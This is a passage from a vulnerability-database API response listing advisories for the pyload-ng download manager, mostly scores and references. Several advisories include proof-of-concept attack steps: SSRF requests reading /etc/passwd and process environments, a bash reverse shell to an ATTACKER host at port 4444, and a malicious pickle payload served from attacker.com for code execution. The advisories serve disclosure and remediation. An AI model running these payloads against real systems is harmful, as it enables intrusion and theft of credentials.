Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/38667?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/38667?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0a5.dev532", "type": "pypi", "namespace": "", "name": "pyload-ng", "version": "0.5.0a5.dev532", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "0.5.0b3.dev100", "latest_non_vulnerable_version": "0.5.0b3.dev100", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37327?format=api", "vulnerability_id": "VCID-1k5h-nhcv-cke9", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\"general\", \"ssl_verify\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42312", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05602", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42312" }, { "reference_url": "https://github.com/advisories/GHSA-4744-96p5-mp2j", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4744-96p5-mp2j" }, { "reference_url": "https://github.com/advisories/GHSA-ppvx-rwh9-7rj7", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ppvx-rwh9-7rj7" }, { "reference_url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx" }, { "reference_url": "https://github.com/advisories/GHSA-w48f-wwwf-f5fr", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w48f-wwwf-f5fr" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-11T18:50:26Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42312", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42312" }, { "reference_url": "https://github.com/advisories/GHSA-ccxc-x975-4hh9", "reference_id": "GHSA-ccxc-x975-4hh9", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-ccxc-x975-4hh9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-42312", "GHSA-ccxc-x975-4hh9", "PYSEC-2026-126" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1k5h-nhcv-cke9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46946?format=api", "vulnerability_id": "VCID-3355-ps9v-7ffh", "summary": "URL Redirection to Untrusted Site ('Open Redirect')\npyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-24808", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02357", "scoring_system": "epss", "scoring_elements": "0.85234", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-24808" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-06T16:57:09Z/" } ], "url": "https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24808", "reference_id": "CVE-2024-24808", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24808" }, { "reference_url": "https://github.com/advisories/GHSA-g3cm-qg2v-2hj5", "reference_id": "GHSA-g3cm-qg2v-2hj5", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g3cm-qg2v-2hj5" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5", "reference_id": "GHSA-g3cm-qg2v-2hj5", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-06T16:57:09Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48566?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev79", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev79" } ], "aliases": [ "CVE-2024-24808", "GHSA-g3cm-qg2v-2hj5" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3355-ps9v-7ffh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89123?format=api", "vulnerability_id": "VCID-4fna-mzsg-w7d5", "summary": "pyLoad: SSRF in parse_urls API endpoint via unvalidated URL parameter\n## Vulnerability Details\n\n**CWE-918**: Server-Side Request Forgery (SSRF)\n\nThe `parse_urls` API function in `src/pyload/core/api/__init__.py` (line 556) fetches arbitrary URLs server-side via `get_url(url)` (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can:\n\n- Make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints\n- **Read local files** via `file://` protocol (pycurl reads the file server-side)\n- **Interact with internal services** via `gopher://` and `dict://` protocols\n- **Enumerate file existence** via error-based oracle (error 37 vs empty response)\n\n### Vulnerable Code\n\n**`src/pyload/core/api/__init__.py` (line 556)**:\n\n```python\ndef parse_urls(self, html=None, url=None):\n if url:\n page = get_url(url) # NO protocol restriction, NO URL validation, NO IP blacklist\n urls.update(RE_URLMATCH.findall(page))\n```\n\nNo validation is applied to the `url` parameter. The underlying pycurl supports `file://`, `gopher://`, `dict://`, and other dangerous protocols by default.\n\n## Steps to Reproduce\n\n### Setup\n\n```bash\ndocker run -d --name pyload -p 8084:8000 linuxserver/pyload-ng:latest\n```\n\nLog in as any user with ADD permission and extract the CSRF token:\n\n```bash\nCSRF=\n```\n\n### PoC 1: Out-of-Band SSRF (HTTP/DNS exfiltration)\n\n```bash\ncurl -s -b \"pyload_session_8000=<SESSION>\" -H \"X-CSRFToken: \" -H \"Content-Type: application/x-www-form-urlencoded\" -d \"url=http://ssrf-proof.<CALLBACK_DOMAIN>/pyload-ssrf-poc\" http://localhost:8084/api/parse_urls\n```\n\n**Result**: 7 DNS/HTTP interactions received on the callback server (Burp Collaborator). Screenshot attached in comments.\n\n### PoC 2: Local file read via file:// protocol\n\n```bash\n# Reading /etc/passwd (file exists) -> empty response (no error)\ncurl ... -d \"url=file:///etc/passwd\" http://localhost:8084/api/parse_urls\n# Response: {}\n\n# Reading nonexistent file -> pycurl error 37\ncurl ... -d \"url=file:///nonexistent\" http://localhost:8084/api/parse_urls\n# Response: {\"error\": \"(37, \\'Couldn't open file /nonexistent\\')\"}\n```\n\nThe difference confirms pycurl successfully reads local files. While `parse_urls` only returns extracted URLs (not raw content), any URL-like strings in configuration files or environment variables are leaked. The error vs success differential also serves as a **file existence oracle**.\n\nFiles confirmed readable:\n- `/etc/passwd`, `/etc/hosts`\n- `/proc/self/environ` (process environment variables)\n- `/config/settings/pyload.cfg` (pyLoad configuration)\n- `/config/data/pyload.db` (SQLite database)\n\n### PoC 3: Internal port scanning\n\n```bash\ncurl ... -d \"url=http://127.0.0.1:22/\" http://localhost:8084/api/parse_urls\n# Response: pycurl.error: (7, 'Failed to connect to 127.0.0.1 port 22')\n```\n\n### PoC 4: gopher:// and dict:// protocol support\n\n```bash\ncurl ... -d \"url=gopher://127.0.0.1:6379/_INFO\" http://localhost:8084/api/parse_urls\ncurl ... -d \"url=dict://127.0.0.1:11211/stat\" http://localhost:8084/api/parse_urls\n```\n\nBoth protocols are accepted by pycurl, enabling interaction with internal services (Redis, memcached, SMTP, etc.).\n\n## Impact\n\nAn authenticated user with ADD permission can:\n\n- **Read local files** via `file://` protocol (configuration, credentials, database files)\n- **Enumerate file existence** via error-based oracle (`Couldn't open file` vs empty response)\n- **Access cloud metadata endpoints** (AWS IAM credentials at `http://169.254.169.254/`, GCP service tokens)\n- **Scan internal network** services and ports via error-based timing\n- **Interact with internal services** via `gopher://` (Redis RCE, SMTP relay) and `dict://`\n- **Exfiltrate data** via DNS/HTTP to attacker-controlled servers\n\nThe multi-protocol support (`file://`, `gopher://`, `dict://`) combined with local file read capability significantly elevates the impact beyond a standard HTTP-only SSRF.\n\n## Proposed Fix\n\nRestrict allowed protocols and validate target addresses:\n\n```python\nfrom urllib.parse import urlparse\nimport ipaddress\nimport socket\n\ndef _is_safe_url(url):\n parsed = urlparse(url)\n if parsed.scheme not in ('http', 'https'):\n return False\n hostname = parsed.hostname\n if not hostname:\n return False\n try:\n for info in socket.getaddrinfo(hostname, None):\n ip = ipaddress.ip_address(info[4][0])\n if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:\n return False\n except (socket.gaierror, ValueError):\n return False\n return True\n\ndef parse_urls(self, html=None, url=None):\n if url:\n if not _is_safe_url(url):\n raise ValueError(\"URL targets a restricted address or uses a disallowed protocol\")\n page = get_url(url)\n urls.update(RE_URLMATCH.findall(page))\n```", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35187", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12628", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35187" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/4032e57d61d8f864e39f4dcfdb567527a50a9e1f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:03:24Z/" } ], "url": "https://github.com/pyload/pyload/commit/4032e57d61d8f864e39f4dcfdb567527a50a9e1f" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:03:24Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35187", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35187" }, { "reference_url": "https://github.com/advisories/GHSA-2wvg-62qm-gj33", "reference_id": "GHSA-2wvg-62qm-gj33", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-2wvg-62qm-gj33" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35187", "GHSA-2wvg-62qm-gj33" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4fna-mzsg-w7d5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90018?format=api", "vulnerability_id": "VCID-6ujx-ntw5-s7dy", "summary": "pyLoad: Improper Neutralization of Special Elements used in an OS Command\n### Summary\n\nThe `ADMIN_ONLY_OPTIONS` protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is **only applied to core config options**, not to plugin config options. The `AntiVirus` plugin stores an executable path (`avfile`) in its config, which is passed directly to `subprocess.Popen()`. A non-admin user with SETTINGS permission can change this path to achieve remote code execution.\n\n### Details\n\n**Safe wrapper — `ADMIN_ONLY_OPTIONS` (core/api/__init__.py:225-235):**\n\n```python\nADMIN_ONLY_OPTIONS = {\n \"reconnect.script\", # Blocks script path change\n \"webui.host\", # Blocks bind address change\n \"ssl.cert_file\", # Blocks cert path change\n \"ssl.key_file\", # Blocks key path change\n # ... other sensitive options\n}\n```\n\n**Where it IS enforced — core config (core/api/__init__.py:255):**\n\n```python\ndef set_config_value(self, section, option, value):\n if f\"{section}.{option}\" in ADMIN_ONLY_OPTIONS:\n if not self.user.is_admin:\n raise PermissionError(\"Admin only\")\n # ...\n```\n\n**Where it is NOT enforced — plugin config (core/api/__init__.py:271-272):**\n\n```python\n # Plugin config - NO admin check at all\n self.pyload.config.set_plugin(category, option, value)\n```\n\n**Dangerous sink — AntiVirus plugin (plugins/addons/AntiVirus.py:75):**\n\n```python\ndef scan_file(self, file):\n avfile = self.config.get(\"avfile\") # User-controlled via plugin config\n avargs = self.config.get(\"avargs\")\n subprocess.Popen([avfile, avargs, target]) # RCE\n```\n\n### PoC\n\n```bash\n# As non-admin user with SETTINGS permission:\n\n# 1. Set AntiVirus executable to a reverse shell\ncurl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \\\n -d 'section=plugin' \\\n -d 'option=AntiVirus.avfile' \\\n -d 'value=/bin/bash'\n\ncurl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \\\n -d 'section=plugin' \\\n -d 'option=AntiVirus.avargs' \\\n -d 'value=-c \"bash -i >& /dev/tcp/ATTACKER/4444 0>&1\"'\n\n# 2. Enable the AntiVirus plugin\ncurl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \\\n -d 'section=plugin' \\\n -d 'option=AntiVirus.activated' \\\n -d 'value=True'\n\n# 3. Add a download - when it completes, AntiVirus.scan_file() runs the payload\ncurl -b session_cookie -X POST http://TARGET:8000/api/add_package \\\n -d 'name=test' \\\n -d 'links=http://example.com/test.zip'\n\n# Result: reverse shell as the pyload process user\n```\n\n### Additional Finding: Arbitrary File Read via storage_folder\n\nThe `storage_folder` validation at `core/api/__init__.py:238-246` uses inverted logic — it prevents the new value from being INSIDE protected directories, but not from being an ANCESTOR of everything. Setting `storage_folder=/` combined with `GET /files/get/etc/passwd` gives arbitrary file read to non-admin users with SETTINGS+DOWNLOAD permissions.\n\n### Impact\n\n- **Remote Code Execution** — Non-admin user can execute arbitrary commands via AntiVirus plugin config\n- **Privilege escalation** — SETTINGS permission (non-admin) escalates to full system access\n- **Arbitrary file read** — Via storage_folder manipulation\n\n### Remediation\n\nApply `ADMIN_ONLY_OPTIONS` to plugin config as well:\n\n```python\n# In set_config_value():\nADMIN_ONLY_PLUGIN_OPTIONS = {\n \"AntiVirus.avfile\",\n \"AntiVirus.avargs\",\n # ... any plugin option that controls executables or paths\n}\n\nif section == \"plugin\" and option in ADMIN_ONLY_PLUGIN_OPTIONS:\n if not self.user.is_admin:\n raise PermissionError(\"Admin only\")\n```\n\nOr better: validate that `avfile` points to a known AV binary before passing to `subprocess.Popen()`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35463", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33094", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35463" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T14:45:57Z/" } ], "url": "https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T14:45:57Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35463", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35463" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35463", "GHSA-w48f-wwwf-f5fr" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6ujx-ntw5-s7dy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89437?format=api", "vulnerability_id": "VCID-9rb6-kh78-sbdf", "summary": "pyLoad: Unprotected storage_folder enables arbitrary file write to Flask session store and code execution (Incomplete fix for CVE-2026-33509)\n## Summary\n\nThe fix for CVE-2026-33509 (GHSA-r7mc-x6x7-cqxx) added an `ADMIN_ONLY_OPTIONS` set to block non-admin users from modifying security-critical config options. The `storage_folder` option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie.\n\n## Required Privileges\n\nThe chain requires a single non-admin user with both `SETTINGS` (to change `storage_folder`) and `ADD` (to submit a download URL) permissions. These are independent bitmask flags that can be assigned together by an admin. The final RCE trigger is unauthenticated: any HTTP request with the crafted session cookie causes deserialization.\n\n## Root Cause\n\n`storage_folder` at `src/pyload/core/api/__init__.py:238-246` has a path check that blocks writing inside PKGDIR or userdir using `os.path.realpath`. However, Flask's filesystem session directory (`/tmp/pyLoad/flask/` in the standard Docker deployment) is outside both restricted paths.\n\npyload configures Flask with `SESSION_TYPE = \"filesystem\"` at `__init__.py:127`. The cachelib `FileSystemCache` stores session files as `md5(\"session:\" + session_id)` and deserializes them with `pickle.load()` on every request that carries the corresponding session cookie.\n\n## Proven RCE Chain\n\nTested against `lscr.io/linuxserver/pyload-ng:latest` Docker image.\n\n**Step 1** — Change download directory to Flask session store:\n\n POST /api/set_config_value\n {\"section\":\"core\",\"category\":\"general\",\"option\":\"storage_folder\",\"value\":\"/tmp/pyLoad/flask\"}\n\nThe path check resolves `/tmp/pyLoad/flask/` via `realpath`. It does not start with PKGDIR (`/lsiopy/.../pyload/`) or userdir (`/config/`). Check passes.\n\n**Step 2** — Compute the target session filename:\n\n md5(\"session:ATTACKER_SESSION_ID\") = 92912f771df217fb6fbfded6705dd47c\n\nFlask-Session uses cachelib which stores files as `md5(key_prefix + session_id)`. The default key prefix is `session:`.\n\n**Step 3** — Host and download the malicious pickle payload:\n\n import pickle, os, struct\n class RCE:\n def __reduce__(self):\n return (os.system, (\"id > /tmp/pyload-rce-success\",))\n session = {\"_permanent\": True, \"rce\": RCE()}\n payload = struct.pack(\"I\", 0) + pickle.dumps(session, protocol=2)\n # struct.pack(\"I\", 0) = cachelib timeout header (0 = never expires)\n\nServe as `http://attacker.com/92912f771df217fb6fbfded6705dd47c` and submit:\n\n POST /api/add_package\n {\"name\":\"x\",\"links\":[\"http://attacker.com/92912f771df217fb6fbfded6705dd47c\"],\"dest\":1}\n\nThe file is saved to `/tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c`.\n\n**Step 4** — Trigger deserialization (unauthenticated):\n\n curl http://target:8000/ -b \"pyload_session_8000=ATTACKER_SESSION_ID\"\n\nThe session cookie name is `pyload_session_` + the configured port number (`__init__.py:128`).\n\nFlask loads the session file. cachelib reads the 4-byte timeout header, confirms the entry is not expired, and calls `pickle.load()`. The RCE gadget executes.\n\n**Result**:\n\n $ docker exec pyload-poc cat /tmp/pyload-rce-success\n uid=1000(abc) gid=1000(users) groups=1000(users)\n\n## Impact\n\nA non-admin user with SETTINGS + ADD permissions achieves arbitrary code execution as the pyload service user. The final trigger requires no authentication. The attacker can:\n\n- Execute arbitrary commands with the privileges of the pyload process\n- Read environment variables (API keys, credentials)\n- Access the filesystem (download history, user database)\n- Pivot to other network resources\n\n## Suggested Fix\n\nAdd `storage_folder` to the ADMIN_ONLY set, or extend the path check to block writing to auto-consumed temporary directories (Flask session store, Jinja bytecode cache, pyload temp directory):\n\n ADMIN_ONLY_OPTIONS = {\n ...\n (\"general\", \"storage_folder\"), # ADDED: prevents session poisoning RCE\n ...\n }\n\nAlso correct the existing wrong option names:\n\n (\"webui\", \"ssl_certfile\"), # FIXED: was \"ssl_cert\" (dead code)\n (\"webui\", \"ssl_keyfile\"), # FIXED: was \"ssl_key\" (dead code)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35464", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22917", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35464" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": 